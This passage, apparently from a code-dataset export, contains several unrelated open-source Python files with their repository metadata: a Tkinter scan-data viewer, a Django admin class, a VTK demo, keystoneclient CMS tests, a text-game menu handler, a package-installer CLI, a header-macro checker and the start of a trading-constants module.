# d = readMDA.readMDA(fname, 1, 0, 0)
if Scan['open']:
d = self.MDA
if d[0]['rank'] < 2: return
if d[2].nd == 0: return
fname = self.mdafile
ofname = mdaAscii_2D1D(d)
if self.textWid != None:
self.textWid.destroy()
self.textWid = None
st = Pmw.ScrolledText(self.interior(),borderframe=1,labelpos=N,
label_text=ofname,usehullsize=1,
hull_width=800,hull_height=400,
text_padx=10,text_pady=10,
text_wrap='none')
fo = open(ofname,'r')
st_text = fo.read()
fo.close()
st.settext(st_text)
st.pack(fill=BOTH, expand=1, padx=5, pady=5)
self.textWid = st
self.textfile = ofname
Scan['txtfile'] = ofname
SH['ix'] = 0
(self.txtpath,fn) = os.path.split(ofname)
def mda2DRpt(self):
# d = readMDA.readMDA(fname, 1, 0, 0)
if Scan['open']:
d = self.MDA
fname = self.mdafile
if d[1].nd > 0 :
ofname = mdaAscii_1D(d)
if d[0]['rank'] < 2: return
if d[2].nd == 0 : return
ofname = mdaAscii_2D(d)
py = d[1].p[0].data
px = d[2].p[0].data
px = px[0]
Scan['X'] = px
Scan['Y'] = py
Scan['txtfile'] = ofname
if self.textWid != None:
self.textWid.destroy()
self.textWid = None
st = Pmw.ScrolledText(self.interior(),borderframe=1,labelpos=N,
label_text=ofname,usehullsize=1,
hull_width=800,hull_height=400,
text_padx=10,text_pady=10,
text_wrap='none')
fo = open(ofname,'r')
st_text = fo.read()
fo.close()
st.settext(st_text)
st.pack(fill=BOTH, expand=1, padx=5, pady=5)
self.textWid = st
self.textfile = ofname
SH['ix'] = -1
writeSH(SH)
(self.txtpath,fn) = os.path.split(ofname)
else:
self.messageMDA()
def mda1DRptPlot(self):
self.mda1DRpt()
self.plotAscii()
def mdaReport(self):
d = self.MDA
if d[0]['rank'] == 1:
self.mda1DRpt()
if d[0]['rank'] >= 2:
self.mda2DRpt()
def mda1DRpt(self):
# d = readMDA.readMDA(fname, 1, 0, 0)
if Scan['open']:
d = self.MDA
fname = self.mdafile
ofname = mdaAscii_1D(d)
if self.textWid != None:
self.textWid.destroy()
self.textWid = None
st = Pmw.ScrolledText(self.interior(),borderframe=1,labelpos=N,
label_text=ofname,usehullsize=1,
hull_width=800,hull_height=400,
text_padx=10,text_pady=10,
text_wrap='none')
fo = open(ofname,'r')
st_text = fo.read()
fo.close()
st.settext(st_text)
st.pack(fill=BOTH, expand=1, padx=5, pady=5)
self.textWid = st
self.textfile = ofname
Scan['txtfile'] = ofname
SH['ix'] = 0
(self.txtpath,fn) = os.path.split(ofname)
else:
self.messageMDA()
def colorbar(self):
W = 256
clrbar =[]
for j in range(10):
clrbar.append(range(W))
clrbar = array(clrbar)
imagebar = PNGImage(self.canvas,clrbar,(2,2))
imagebar.pack(side='top')
self.imagebar = imagebar
def executeCT(self):
sels = self.textWid.getcurselection()
sels = string.split(sels[0])
CT_id = string.atoi(sels[0])
ps = str(CT[CT_id])
fo = open('pal.dat','wb')
fo.write(ps)
fo.close()
self.imagebar.destroy()
self.colorbar()
def setCTdialog(self):
if self.textWid != None:
self.textWid.destroy()
self.textWid = None
CT = readCT()
CT_id=39
frame = self.interior()
self.canvas = Canvas(frame,width=300,height=50)
self.canvas.pack()
self.colorbar()
dname=('0 B-W LINEAR','1 BLUE/WHITE','2 GRN-RED-BLU-WHT',
'3 RED TEMPERATURE','4 BLUE/GREEN/RED/YELLOW','5 STD GAMMA-II',
'6 PRISM','7 RED-PURPLE','8 GREEN/WHITE LINEAR',
'9 GRN/WHT EXPONENTIAL','10 GREEN-PINK','11 BLUE-RED',
'12 16-LEVEL','13 RAINBOW','14 STEPS',
'15 STERN SPECIAL','16 Haze','17 Blue-Pastel-Red',
'18 Pastels','19 Hue Sat Lightness1','20 Hue Sat Lightness2',
'21 Hue Sat Value 1','22 Hue Sat Value 2','23 Purple-Red + Stripes',
'24 Beach','25 Mac Style','26 Eos A',
'27 Eos B','28 Hardcandy','29 Nature',
'30 Ocean','31 Peppermint','32 Plasma',
'33 Blue-Red','34 Rainbow',
'35 Blue Waves','36 Volcano','37 Waves',
'38 Rainbow18','39 Rainbow + white','40 Rainbow + black')
box = Pmw.ScrolledListBox(frame,
labelpos=N,label_text='Color Table #',
items=dname,
listbox_height=5,vscrollmode='static',
selectioncommand= self.executeCT,
dblclickcommand= self.executeCT,
usehullsize=1, hull_width=400, hull_height=200)
# box.pack(fill=BOTH,expand=1,padx=10,pady=10)
box.pack()
self.textWid = box
def selectionCommand(self):
box = self.textWid
sels = box.getcurselection()
sels = string.split(sels[0])
sel = string.atoi(sels[0])
Scan['2d'] = sel
d = self.MDA
pick2d(d,sel,updown=Scan['updown'])
def get2Ddetector(self):
if self.mdafile == '':
self.messageMDA()
return
if self.textWid != None:
self.textWid.destroy()
self.textWid = None
root = self.interior()
d = self.MDA
nd = d[2].nd
dname =[]
for i in range(nd):
lst = str(i) + ' '+d[2].d[i].fieldName +' ' + d[2].d[i].name +' '+ d[2].d[i].desc +' '+d[2].d[i].unit
dname.append(lst)
box = Pmw.ScrolledListBox(root,
labelpos=N,label_text='2D Image Seq #',
items=(dname[0:nd]),
listbox_height=5,vscrollmode='static',
selectioncommand= self.selectionCommand,
dblclickcommand= self.selectionCommand,
usehullsize=1, hull_width=500, hull_height=200)
# box.pack(fill=BOTH,expand=1,padx=10,pady=10)
box.pack()
self.textWid = box
def getpanimage(self):
file = self.mdafile
if file != '':
d = self.MDA
pal = readPalette()
if d[0]['rank'] > 1:
det2D(d[2].d[0:d[2].nd],scale=(1,1),columns=5,file=file,pal=pal)
else:
self.messageMDA()
def headerMDA(self,d,J,st_text):
try:
if d[J].nd > 0:
st_text = st_text+d[J].scan_name+'\n'
st_test = st_text+'NPTS: '+str(d[J].npts)+'\n'
st_test = st_text+'CURR_PT: '+str(d[J].curr_pt)+'\n'
st_text = st_text + '**'+str(J)+'D detectors**\n'
for i in range(d[J].nd):
st_text=st_text+d[J].d[i].fieldName+' : '+d[J].d[i].name+', '+d[J].d[i].desc+', '+d[J].d[i].unit+'\n'
except IndexError:
pass
return st_text
def openMDA(self):
fname = askopenfilename( initialdir=self.mdapath,
filetypes=[("MDA File", '.mda'),
("All Files","*")])
if fname =='':
return
self.mdafile = fname
(self.mdapath, fn) = os.path.split(fname)
d = readMDA(fname)
self.MDA = d
Scan['data'] = d
Scan['open'] = 1
st_text = 'Please use ViewMDA menu to access MDA 1D/2D data array\n\n'
try:
if d[1].nd > 0:
st_text = self.headerMDA(d,1,st_text)
if d[1].nd > 0:
V=[]
for i in range(85):
V.append('')
for i in range(d[1].nd):
V[i] = d[1].d[i].fieldName
file='pvs'
fd = open(file,'w')
fd.write(str(V))
fd.close()
except IndexError:
pass
try:
if d[2].nd > 0:
st_text = self.headerMDA(d,2,st_text)
except IndexError:
pass
try:
if d[3].nd > 0:
st_text = self.headerMDA(d,3,st_text)
except IndexError:
pass
if self.textWid != None:
self.textWid.destroy()
self.textWid = None
st = Pmw.ScrolledText(self.interior(),borderframe=1,labelpos=N,
label_text=fname,usehullsize=1,
hull_width=800,hull_height=400,
text_padx=10,text_pady=10,
text_wrap='none')
st.settext(st_text)
st.pack(fill=BOTH, expand=1, padx=1, pady=1)
self.textWid = st
def openHelpText(self):
if self.textWid != None:
self.textWid.destroy()
self.textWid = None
fname = os.environ['PYTHONSTARTUP']+os.sep+'pviewer_help.txt'
st = Pmw.ScrolledText(self.interior(),borderframe=1,labelpos=N,
label_text=fname,usehullsize=1,
hull_width=800,hull_height=400,
text_padx=10,text_pady=10,
text_wrap='none')
st.importfile(fname)
st.pack(fill=BOTH, expand=1, padx=1, pady=1)
self.textWid = st
def openAscii(self):
fname = askopenfilename(initialdir=self.txtpath,
filetypes=[("ASCII Data", '.txt'),
("Image Files","*im*"),
("Data Files",".dat"),
("All Files","*")])
if fname == '':
return
(self.txtpath,fn) = os.path.split(fname)
Scan['txtfile'] = fname
self.textfile = fname
if self.textWid != None:
self.textWid.destroy()
self.textWid = None
st = Pmw.ScrolledText(self.interior(),borderframe=1,labelpos=N,
label_text=fname,usehullsize=1,
hull_width=800,hull_height=400,
text_padx=10,text_pady=10,
text_wrap='none')
st.importfile(fname)
st.pack(fill=BOTH, expand=1, padx=1, pady=1)
self.textWid = st
def imageAscii(self):
if self.textfile != '':
file = self.textfile
data = readArray(file)
data = rowreverse(data)
TV(data)
else:
self.messageAscii()
def plot2ddialog(self):
if self.textfile != '':
file = self.textfile
data = readArray(file)
data = rowreverse(data)
nr = len(data)
nc = len(data[0])
x = range(nc)
y = range(nr)
data = array(data)
if Scan['updown']:
plot2dUpdown(data,x,y,title=file)
else:
plot2d(data,x,y,title=file)
else:
self.messageAscii()
def plotAscii(self):
if self.textfile == '':
self.messageAscii()
return
try:
os.system('plotAscii.py '+self.textfile+' &')
except AttributeError:
pass
def XYrowcolDialog(self):
file = Scan['txtfile']
if file == '':
self.messageAscii()
return
ix = GetXYdialog(self.interior())
def XYVDialog(self):
file = Scan['txtfile']
if file == '':
self.messageAscii()
return
ix = GetXYVdialog(self.interior())
def XYrangeDialog(self):
file = Scan['txtfile']
if file == '':
self.messageAscii()
return
ix = defineXYdialog(self.interior())
def XcolDialog(self):
if self.textfile == '':
self.messageAscii()
else:
Scan['txtfile'] = self.textfile
ix=GetXdialog(self.interior())
def legenddialog(self):
# dialog=GetLegends(self.interior())
GetLegends(self.interior())
def DIlinedialog(self):
file = Scan['txtfile']
if file == '': return
dialog=pickDIdialog(self.interior())
def updownImage(self):
Scan['updown'] = self.toggleUpdownVar.get()
def pick2Ddialog(self):
if Scan['open']:
dialog=pick2Ddetector(self.interior())
def createInterface(self):
AppShell.AppShell.createInterface(self)
self.addMoremenuBar()
# self.createButtons()
self.textWid = None
self.mdafile = ''
self.textfile = ''
self.startup()
if __name__ == '__main__':
SH = {'ix': 0, 'printer': '', 'font': 'Verdana 10 bold', }
if os.path.isfile('SH'):
SH = readSH()
else:
writeSH(SH)
Scan = { 'open': 0,
'2d': 0,
'updown': 1,
'1d': 0,
'nc': 0,
'CT': 39,
'rowcol': [3,2,4,2],
'txtfile': '',
'pvs1': None,
'pvs2': None,
'pvs3': None,
'X': None,
'Y': None,
'im': None,
'data': None }
CT = readCT()
pt = pviewer()
pt.run()
|
bsd-2-clause
| -3,291,895,447,585,921,000
| 27.987974
| 146
| 0.633361
| false
| 2.725818
| false
| false
| false
|
c0cky/mediathread
|
mediathread/projects/admin.py
|
1
|
1386
|
from django.contrib import admin
from django.contrib.auth.models import User
from mediathread.projects.models import Project
class ProjectAdmin(admin.ModelAdmin):
search_fields = ("title",
"participants__last_name", "author__username",
"participants__last_name")
list_display = ("title", "course", "author", "modified",
"date_submitted", "id", "project_type",
"response_view_policy")
filter_horizontal = ('participants',)
def formfield_for_foreignkey(self, db_field, request, **kwargs):
if db_field.name == "author":
kwargs["queryset"] = User.objects.all().order_by('username')
return super(ProjectAdmin, self).formfield_for_foreignkey(db_field,
request,
**kwargs)
def formfield_for_manytomany(self, db_field, request, **kwargs):
if db_field.name == "participants":
kwargs["queryset"] = User.objects.all().order_by('username')
return super(ProjectAdmin, self).formfield_for_manytomany(db_field,
request,
**kwargs)
admin.site.register(Project, ProjectAdmin)
|
gpl-2.0
| 7,909,254,326,937,188,000
| 43.709677
| 75
| 0.519481
| false
| 4.95
| false
| false
| false
|
lorensen/VTKExamples
|
src/Python/Deprecated/GeometricObjects/ParametricObjectsDemo.py
|
1
|
5485
|
# !/usr/bin/env python
# -*- coding: utf-8 -*-
import vtk
def main():
colors = vtk.vtkNamedColors()
colors.SetColor("BkgColor", [26, 51, 102, 255])
parametricObjects = list()
parametricObjects.append(vtk.vtkParametricBoy())
parametricObjects.append(vtk.vtkParametricConicSpiral())
parametricObjects.append(vtk.vtkParametricCrossCap())
parametricObjects.append(vtk.vtkParametricDini())
parametricObjects.append(vtk.vtkParametricEllipsoid())
parametricObjects[-1].SetXRadius(0.5)
parametricObjects[-1].SetYRadius(2.0)
parametricObjects.append(vtk.vtkParametricEnneper())
parametricObjects.append(vtk.vtkParametricFigure8Klein())
parametricObjects.append(vtk.vtkParametricKlein())
parametricObjects.append(vtk.vtkParametricMobius())
parametricObjects[-1].SetRadius(2)
parametricObjects[-1].SetMinimumV(-0.5)
parametricObjects[-1].SetMaximumV(0.5)
parametricObjects.append(vtk.vtkParametricRandomHills())
parametricObjects[-1].AllowRandomGenerationOff()
parametricObjects.append(vtk.vtkParametricRoman())
parametricObjects.append(vtk.vtkParametricSuperEllipsoid())
parametricObjects[-1].SetN1(0.5)
parametricObjects[-1].SetN2(0.1)
parametricObjects.append(vtk.vtkParametricSuperToroid())
parametricObjects[-1].SetN1(0.2)
parametricObjects[-1].SetN2(3.0)
parametricObjects.append(vtk.vtkParametricTorus())
parametricObjects.append(vtk.vtkParametricSpline())
# Add some points to the parametric spline.
inputPoints = vtk.vtkPoints()
rng = vtk.vtkMinimalStandardRandomSequence()
rng.SetSeed(8775070)
for i in range(0, 10):
rng.Next()
x = rng.GetRangeValue(0.0, 1.0)
rng.Next()
y = rng.GetRangeValue(0.0, 1.0)
rng.Next()
z = rng.GetRangeValue(0.0, 1.0)
inputPoints.InsertNextPoint(x, y, z)
parametricObjects[-1].SetPoints(inputPoints)
parametricFunctionSources = list()
renderers = list()
mappers = list()
actors = list()
textmappers = list()
textactors = list()
# Create one text property for all
textProperty = vtk.vtkTextProperty()
textProperty.SetFontSize(12)
textProperty.SetJustificationToCentered()
backProperty = vtk.vtkProperty()
backProperty.SetColor(colors.GetColor3d("Tomato"))
# Create a parametric function source, renderer, mapper, and actor
# for each object
for i in range(0, len(parametricObjects)):
parametricFunctionSources.append(vtk.vtkParametricFunctionSource())
parametricFunctionSources[i].SetParametricFunction(parametricObjects[i])
parametricFunctionSources[i].SetUResolution(51)
parametricFunctionSources[i].SetVResolution(51)
parametricFunctionSources[i].SetWResolution(51)
parametricFunctionSources[i].Update()
mappers.append(vtk.vtkPolyDataMapper())
mappers[i].SetInputConnection(parametricFunctionSources[i].GetOutputPort())
actors.append(vtk.vtkActor())
actors[i].SetMapper(mappers[i])
actors[i].GetProperty().SetColor(colors.GetColor3d("Banana"))
actors[i].GetProperty().SetSpecular(.5)
actors[i].GetProperty().SetSpecularPower(20)
actors[i].SetBackfaceProperty(backProperty)
textmappers.append(vtk.vtkTextMapper())
textmappers[i].SetInput(parametricObjects[i].GetClassName())
textmappers[i].SetTextProperty(textProperty)
textactors.append(vtk.vtkActor2D())
textactors[i].SetMapper(textmappers[i])
textactors[i].SetPosition(100, 16)
renderers.append(vtk.vtkRenderer())
renderers[i].AddActor(actors[i])
renderers[i].AddActor(textactors[i])
renderers[i].SetBackground(colors.GetColor3d("BkgColor"))
# Setup the viewports
xGridDimensions = 4
yGridDimensions = 4
rendererSize = 200
renderWindow = vtk.vtkRenderWindow()
renderWindow.SetWindowName("Parametric Objects Demonstration")
renderWindow.SetSize(rendererSize * xGridDimensions, rendererSize * yGridDimensions)
for row in range(0, yGridDimensions):
for col in range(0, xGridDimensions):
index = row * xGridDimensions + col
# (xmin, ymin, xmax, ymax)
viewport = [float(col) / xGridDimensions,
float(yGridDimensions - (row + 1)) / yGridDimensions,
float(col + 1) / xGridDimensions,
float(yGridDimensions - row) / yGridDimensions]
if index > (len(actors) - 1):
# Add a renderer even if there is no actor.
# This makes the render window background all the same color.
ren = vtk.vtkRenderer()
ren.SetBackground(colors.GetColor3d("BkgColor"))
ren.SetViewport(viewport)
renderWindow.AddRenderer(ren)
continue
renderers[index].SetViewport(viewport)
renderers[index].ResetCamera()
renderers[index].GetActiveCamera().Azimuth(30)
renderers[index].GetActiveCamera().Elevation(-30)
renderers[index].GetActiveCamera().Zoom(0.9)
renderers[index].ResetCameraClippingRange()
renderWindow.AddRenderer(renderers[index])
interactor = vtk.vtkRenderWindowInteractor()
interactor.SetRenderWindow(renderWindow)
renderWindow.Render()
interactor.Start()
if __name__ == '__main__':
main()
|
apache-2.0
| 3,249,549,297,955,955,000
| 36.827586
| 88
| 0.678213
| false
| 3.728756
| false
| false
| false
|
jamielennox/python-keystoneclient
|
keystoneclient/tests/test_cms.py
|
1
|
6122
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import errno
import os
import subprocess
import mock
import testresources
from testtools import matchers
from keystoneclient.common import cms
from keystoneclient import exceptions
from keystoneclient.tests import client_fixtures
from keystoneclient.tests import utils
class CMSTest(utils.TestCase, testresources.ResourcedTestCase):
"""Unit tests for the keystoneclient.common.cms module."""
resources = [('examples', client_fixtures.EXAMPLES_RESOURCE)]
def test_cms_verify(self):
self.assertRaises(exceptions.CertificateConfigError,
cms.cms_verify,
'data',
'no_exist_cert_file',
'no_exist_ca_file')
def test_token_tocms_to_token(self):
with open(os.path.join(client_fixtures.CMSDIR,
'auth_token_scoped.pem')) as f:
AUTH_TOKEN_SCOPED_CMS = f.read()
self.assertEqual(cms.token_to_cms(self.examples.SIGNED_TOKEN_SCOPED),
AUTH_TOKEN_SCOPED_CMS)
tok = cms.cms_to_token(cms.token_to_cms(
self.examples.SIGNED_TOKEN_SCOPED))
self.assertEqual(tok, self.examples.SIGNED_TOKEN_SCOPED)
def test_asn1_token(self):
self.assertTrue(cms.is_asn1_token(self.examples.SIGNED_TOKEN_SCOPED))
self.assertFalse(cms.is_asn1_token('FOOBAR'))
def test_cms_sign_token_no_files(self):
self.assertRaises(subprocess.CalledProcessError,
cms.cms_sign_token,
self.examples.TOKEN_SCOPED_DATA,
'/no/such/file', '/no/such/key')
def test_cms_sign_token_no_files_pkiz(self):
self.assertRaises(subprocess.CalledProcessError,
cms.pkiz_sign,
self.examples.TOKEN_SCOPED_DATA,
'/no/such/file', '/no/such/key')
def test_cms_sign_token_success(self):
self.assertTrue(
cms.pkiz_sign(self.examples.TOKEN_SCOPED_DATA,
self.examples.SIGNING_CERT_FILE,
self.examples.SIGNING_KEY_FILE))
def test_cms_verify_token_no_files(self):
self.assertRaises(exceptions.CertificateConfigError,
cms.cms_verify,
self.examples.SIGNED_TOKEN_SCOPED,
'/no/such/file', '/no/such/key')
def test_cms_verify_token_no_oserror(self):
def raise_OSError(*args):
e = OSError()
e.errno = errno.EPIPE
raise e
with mock.patch('subprocess.Popen.communicate', new=raise_OSError):
try:
cms.cms_verify("x", '/no/such/file', '/no/such/key')
except exceptions.CertificateConfigError as e:
self.assertIn('/no/such/file', e.output)
self.assertIn('Hit OSError ', e.output)
else:
self.fail('Expected exceptions.CertificateConfigError')
def test_cms_verify_token_scoped(self):
cms_content = cms.token_to_cms(self.examples.SIGNED_TOKEN_SCOPED)
self.assertTrue(cms.cms_verify(cms_content,
self.examples.SIGNING_CERT_FILE,
self.examples.SIGNING_CA_FILE))
def test_cms_verify_token_scoped_expired(self):
cms_content = cms.token_to_cms(
self.examples.SIGNED_TOKEN_SCOPED_EXPIRED)
self.assertTrue(cms.cms_verify(cms_content,
self.examples.SIGNING_CERT_FILE,
self.examples.SIGNING_CA_FILE))
def test_cms_verify_token_unscoped(self):
cms_content = cms.token_to_cms(self.examples.SIGNED_TOKEN_UNSCOPED)
self.assertTrue(cms.cms_verify(cms_content,
self.examples.SIGNING_CERT_FILE,
self.examples.SIGNING_CA_FILE))
def test_cms_verify_token_v3_scoped(self):
cms_content = cms.token_to_cms(self.examples.SIGNED_v3_TOKEN_SCOPED)
self.assertTrue(cms.cms_verify(cms_content,
self.examples.SIGNING_CERT_FILE,
self.examples.SIGNING_CA_FILE))
def test_cms_hash_token_no_token_id(self):
token_id = None
self.assertThat(cms.cms_hash_token(token_id), matchers.Is(None))
def test_cms_hash_token_not_pki(self):
"""If the token_id is not a PKI token then it returns the token_id."""
token = 'something'
self.assertFalse(cms.is_asn1_token(token))
self.assertThat(cms.cms_hash_token(token), matchers.Is(token))
def test_cms_hash_token_default_md5(self):
"""The default hash method is md5."""
token = self.examples.SIGNED_TOKEN_SCOPED
token_id_default = cms.cms_hash_token(token)
token_id_md5 = cms.cms_hash_token(token, mode='md5')
self.assertThat(token_id_default, matchers.Equals(token_id_md5))
# md5 hash is 32 chars.
self.assertThat(token_id_default, matchers.HasLength(32))
def test_cms_hash_token_sha256(self):
"""Can also hash with sha256."""
token = self.examples.SIGNED_TOKEN_SCOPED
token_id = cms.cms_hash_token(token, mode='sha256')
# sha256 hash is 64 chars.
self.assertThat(token_id, matchers.HasLength(64))
def load_tests(loader, tests, pattern):
return testresources.OptimisingTestSuite(tests)
|
apache-2.0
| -8,033,659,842,411,192,000
| 40.364865
| 78
| 0.601764
| false
| 3.929397
| true
| false
| false
|
rmed/textventures
|
src/textventures/instances/key_navigation.py
|
1
|
4144
|
# -*- coding: utf-8 -*-
# This file is part of TextVentures - https://github.com/RMed/textventures
#
# Copyright (C) 2013 Rafael Medina García <rafamedgar@gmail.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
import menu, sys
class Listener:
"""Gets user input for navigation."""
def __init__(self):
# Check for Windows platform
if sys.platform.startswith('win'):
import msvcrt
# Check for UNIX platforms
else:
import tty
def __call__(self):
# Windows
if sys.platform.startswith('win'):
import msvcrt
# Save character
char = msvcrt.getch()
# UNIX
else:
import tty, termios
# Read character
fd = sys.stdin.fileno()
attr = termios.tcgetattr(fd)
try:
tty.setraw(sys.stdin.fileno())
char = sys.stdin.read(1)
finally:
termios.tcsetattr(fd, termios.TCSADRAIN, attr)
# Return character
return char
class Action:
"""Check the input character and act accordingly."""
def __init__(self, input_char, action_type):
"""Arguments:
input_char -- pressed character
action_type -- type of the action (menu, load, etc)
"""
self.char = input_char.lower()
self.action = action_type
def __call__(self):
# Check the action type
if self.action == 'main':
# Main menu
if self.char == 'n':
# New game menu
menu.newgame_menu()
elif self.char == 'l':
# Load game menu
menu.load_menu()
elif self.char == 'o':
# Options menu
menu.options_menu()
elif self.char == 'h':
# Help menu
menu.help_menu()
elif self.char == 'a':
# About menu
menu.about_menu()
elif self.char == 'e':
# Exit program
sys.exit()
elif self.action == 'load':
# Load menu
if self.char == 'b':
# Back to main menu
menu.main_menu()
elif self.char == 'c':
# Choose game
return self.char
elif self.action == 'options':
# Load menu
if self.char == 'b':
# Back to main menu
menu.main_menu()
elif self.char == 'c':
# Choose language
return self.char
elif self.action == 'new':
# New game menu
if self.char == 'b':
# Back to main menu
menu.main_menu()
elif self.char == 'c':
# Choose game
return self.char
elif self.action == 'help':
# Help menu
if self.char == 'b':
# Back to main menu
menu.main_menu()
elif self.action == 'about':
# About menu
if self.char == 'l':
menu.show_license()
elif self.char == 'b':
# Back to main menu
menu.main_menu()
elif self.action == 'license':
# License
if self.char == 'b':
# Back to About menu
menu.about_menu()
|
gpl-2.0
| 5,757,127,063,372,303,000
| 30.150376
| 74
| 0.502052
| false
| 4.542763
| false
| false
| false
|
banansson/cask
|
cask.py
|
1
|
3281
|
#!/usr/bin/python
import sys
import argparse
from os import path
from src.bag import Bag
from src.package import Package
from src.task import Task
from src.message import Message
from src.application import Application
from src.application_info import ApplicationInfo
from src.bootstrap import Bootstrap
from src import utils
def run(argv):
default_packs_dir = "~/.config/cask/packs"
default_target_dir = "~"
parser = argparse.ArgumentParser()
actions = parser.add_mutually_exclusive_group()
actions.add_argument('--version', action='store_true',
help='Display version')
actions.add_argument('--bootstrap', action='store_true',
help='run bootstrap test')
parser.add_argument('command', nargs='?', help='Command to run: list, query, install')
parser.add_argument('-v', '--verbose', action='count', default=0,
help='be verbose')
parser.add_argument('-d', '--dryrun', action='store_true',
help='run in test mode, nothing is installed')
parser.add_argument('-s', '--source', action='store',
default=default_packs_dir,
help='override directory in which to look for packages')
parser.add_argument('-t', '--target', action='store',
default=default_target_dir,
help='override directory in which to install packages')
parser.add_argument('package', nargs='?', help='Name of package')
args = parser.parse_args()
verbose = args.verbose
message = Message(sys.stdout, verbose > 0)
if args.bootstrap:
bootstrap = Bootstrap()
if args.verbose:
bootstrap.verbose(message)
else:
verifications = bootstrap.verify_all()
if not verifications[0]:
message.info('Boostrap verification failed! Use verbose flag for more detailed output')
message.major('Errors:')
for error in verifications[1]:
message.minor(error)
else:
message.info('Boostrap verification succeeded')
return 0
appinfo = ApplicationInfo()
if args.version:
message.info(appinfo.name())
return 0
if not(args.command or args.package):
message.info("No package specified, use -h or --help for help. Listing of")
message.info("all packages can be done using the 'list' argument.")
return 0
(valid, source) = utils.try_lookup_dir(args.source)
if not valid:
message.error("No such directory: %s" % source)
return 0
message.plain("Looking for packages in: %s" % source)
target = utils.lookup_dir(args.target)
bag = Bag(path.abspath(source))
app = Application(bag, message, args)
commands = {}
commands['list'] = lambda bag, message, args: app.list(verbose)
commands['query'] = lambda bag, message, args: app.query(args.package, target)
commands['install'] = lambda bag, message, args: app.install(args.package, target, args.dryrun)
if len(args.command) == 0:
message.info("No action specified, use -h or --help for help.")
return 0
cmd = args.command
if cmd not in commands:
message.info('No such command: {:s}'.format(cmd))
return 0
commands[cmd](bag, message, args)
return 0
if __name__ == '__main__':
code = run(sys.argv)
exit(code)
|
mit
| 1,634,004,693,254,727,000
| 29.663551
| 97
| 0.650716
| false
| 3.919952
| false
| false
| false
|
batermj/algorithm-challenger
|
code-analysis/programming_anguage/python/source_codes/Python3.8.0/Python-3.8.0/Tools/scripts/pep384_macrocheck.py
|
4
|
4720
|
"""
pep384_macrocheck.py
This programm tries to locate errors in the relevant Python header
files where macros access type fields when they are reachable from
the limided API.
The idea is to search macros with the string "->tp_" in it.
When the macro name does not begin with an underscore,
then we have found a dormant error.
Christian Tismer
2018-06-02
"""
import sys
import os
import re
DEBUG = False
def dprint(*args, **kw):
if DEBUG:
print(*args, **kw)
def parse_headerfiles(startpath):
"""
Scan all header files which are reachable fronm Python.h
"""
search = "Python.h"
name = os.path.join(startpath, search)
if not os.path.exists(name):
raise ValueError("file {} was not found in {}\n"
"Please give the path to Python's include directory."
.format(search, startpath))
errors = 0
with open(name) as python_h:
while True:
line = python_h.readline()
if not line:
break
found = re.match(r'^\s*#\s*include\s*"(\w+\.h)"', line)
if not found:
continue
include = found.group(1)
dprint("Scanning", include)
name = os.path.join(startpath, include)
if not os.path.exists(name):
name = os.path.join(startpath, "../PC", include)
errors += parse_file(name)
return errors
def ifdef_level_gen():
"""
Scan lines for #ifdef and track the level.
"""
level = 0
ifdef_pattern = r"^\s*#\s*if" # covers ifdef and ifndef as well
endif_pattern = r"^\s*#\s*endif"
while True:
line = yield level
if re.match(ifdef_pattern, line):
level += 1
elif re.match(endif_pattern, line):
level -= 1
def limited_gen():
"""
Scan lines for Py_LIMITED_API yes(1) no(-1) or nothing (0)
"""
limited = [0] # nothing
unlimited_pattern = r"^\s*#\s*ifndef\s+Py_LIMITED_API"
limited_pattern = "|".join([
r"^\s*#\s*ifdef\s+Py_LIMITED_API",
r"^\s*#\s*(el)?if\s+!\s*defined\s*\(\s*Py_LIMITED_API\s*\)\s*\|\|",
r"^\s*#\s*(el)?if\s+defined\s*\(\s*Py_LIMITED_API"
])
else_pattern = r"^\s*#\s*else"
ifdef_level = ifdef_level_gen()
status = next(ifdef_level)
wait_for = -1
while True:
line = yield limited[-1]
new_status = ifdef_level.send(line)
dir = new_status - status
status = new_status
if dir == 1:
if re.match(unlimited_pattern, line):
limited.append(-1)
wait_for = status - 1
elif re.match(limited_pattern, line):
limited.append(1)
wait_for = status - 1
elif dir == -1:
# this must have been an endif
if status == wait_for:
limited.pop()
wait_for = -1
else:
# it could be that we have an elif
if re.match(limited_pattern, line):
limited.append(1)
wait_for = status - 1
elif re.match(else_pattern, line):
limited.append(-limited.pop()) # negate top
def parse_file(fname):
errors = 0
with open(fname) as f:
lines = f.readlines()
type_pattern = r"^.*?->\s*tp_"
define_pattern = r"^\s*#\s*define\s+(\w+)"
limited = limited_gen()
status = next(limited)
for nr, line in enumerate(lines):
status = limited.send(line)
line = line.rstrip()
dprint(fname, nr, status, line)
if status != -1:
if re.match(define_pattern, line):
name = re.match(define_pattern, line).group(1)
if not name.startswith("_"):
# found a candidate, check it!
macro = line + "\n"
idx = nr
while line.endswith("\\"):
idx += 1
line = lines[idx].rstrip()
macro += line + "\n"
if re.match(type_pattern, macro, re.DOTALL):
# this type field can reach the limited API
report(fname, nr + 1, macro)
errors += 1
return errors
def report(fname, nr, macro):
f = sys.stderr
print(fname + ":" + str(nr), file=f)
print(macro, file=f)
if __name__ == "__main__":
p = sys.argv[1] if sys.argv[1:] else "../../Include"
errors = parse_headerfiles(p)
if errors:
# somehow it makes sense to raise a TypeError :-)
raise TypeError("These {} locations contradict the limited API."
.format(errors))
|
apache-2.0
| -1,668,539,338,901,291,500
| 30.891892
| 75
| 0.523517
| false
| 3.725335
| false
| false
| false
|
yongfuyang/vnpy
|
vn.trader/ctaAlgo/ctaBase.py
|
1
|
5912
|
# encoding: UTF-8
'''
本文件中包含了CTA模块中用到的一些基础设置、类和常量等。
'''
from __future__ import division
# 把vn.trader根目录添加到python环境变量中
import sys
sys.path.append('..')
# 常量定义
# CTA引擎中涉及到的交易方向类型
CTAORDER_BUY = u'买开'
